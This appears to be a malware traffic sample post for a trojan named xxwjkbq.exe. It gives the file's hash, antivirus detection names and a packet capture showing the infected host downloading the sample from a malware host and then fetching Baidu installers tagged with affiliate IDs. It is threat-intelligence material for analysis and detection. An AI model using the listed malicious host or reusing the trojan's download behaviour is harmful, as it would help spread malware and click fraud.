Baidu.com Clickfraud Malware Trojan FULL PCAP File Download Traffic Sample xxwjkbq.exe

SHA256: 414e2d416596ebd32f2b4664964e4340a4c0ce9ad576c88f0272210d85c3911a
File name: xxwjkbq.exe
Detection ratio: 37 / 55
Analysis date: 2016-11-02 02:03:14 UTC ( 2 minutes ago )
AVware Trojan.Win32.Generic!BT 20161102
AegisLab Troj.W32.Agent.apfit!c 20161102
Antiy-AVL Trojan/Win32.Agent 20161102
Avast Win32:Malware-gen 20161102
Avira (no cloud) TR/Agent.1724416.88 20161101
CAT-QuickHeal Trojan.Agent 20161101
ClamAV Win.Trojan.Agent-1394599 20161101
Comodo Worm.Win32.Dropper.RA 20161102
CrowdStrike Falcon (ML) malicious_confidence_98% (W) 20161024
Cyren W32/Agent.EW.gen!Eldorado 20161102
DrWeb Trojan.MulDrop5.50993 20161102
ESET-NOD32 a variant of Generik.DREGUOX 20161101
F-Prot W32/Agent.EW.gen!Eldorado 20161102
F-Secure Trojan:W32/DelfInject.R 20161102
Fortinet W32/Agent.APFIT!tr 20161102
GData Win32.Adware.FlyStudio.O 20161101
Ikarus Trojan-GameThief.Win32.OnLineGames 20161101
Invincea trojan.win32.startpage.pvo!bit 20161018
Jiangmin Trojan/Generic.bbjlo 20161101
K7AntiVirus Trojan ( 004b4ad01 ) 20161101

 

2016-11-01 22:10:42.965215 IP 192.168.1.102.51210 > 175.6.5.125.80: Flags [P.], seq 0:289, ack 1, win 256, length 289: HTTP: GET /xxwjkbq.exe HTTP/1.1
E..Ix’@…
….f…}.
.P….Z…P…….GET /xxwjkbq.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dx7.52zsoft.com
Connection: Keep-Alive

2016-11-01 22:10:43.218582 IP 192.168.1.102.51210 > 175.6.5.125.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0
E..4x(@….

E..(0H@…f….fwT*….PFs..}(#nP………….
2016-11-01 22:11:55.233260 IP 192.168.1.102.51215 > 119.84.42.46.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000170805.exe HTTP/1.1
E..G0I@…e….fwT*….PFs..}(#nP….h..GET /ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000170805.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
Referer: http://dlsw.br.baidu.com/ditui/zujian
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

2016-11-01 22:11:55.365398 IP 192.168.1.102.51215 > 119.84.42.46.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {0:1}], length 0

E..(0P@…f….fwT*….P;.?.|.;iP…O………
2016-11-01 22:11:56.062433 IP 192.168.1.102.51216 > 119.84.42.46.80: Flags [P.], seq 0:283, ack 1, win 256, length 283: HTTP: GET /ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000170805.exe HTTP/1.1
E..C0Q@…e….fwT*….P;.?.|.;iP….5..GET /ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000170805.exe HTTP/1.1
Host: dlsw.br.baidu.com
Accept: */*
Referer: http://dlsw.br.baidu.com/ditui/zujian
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close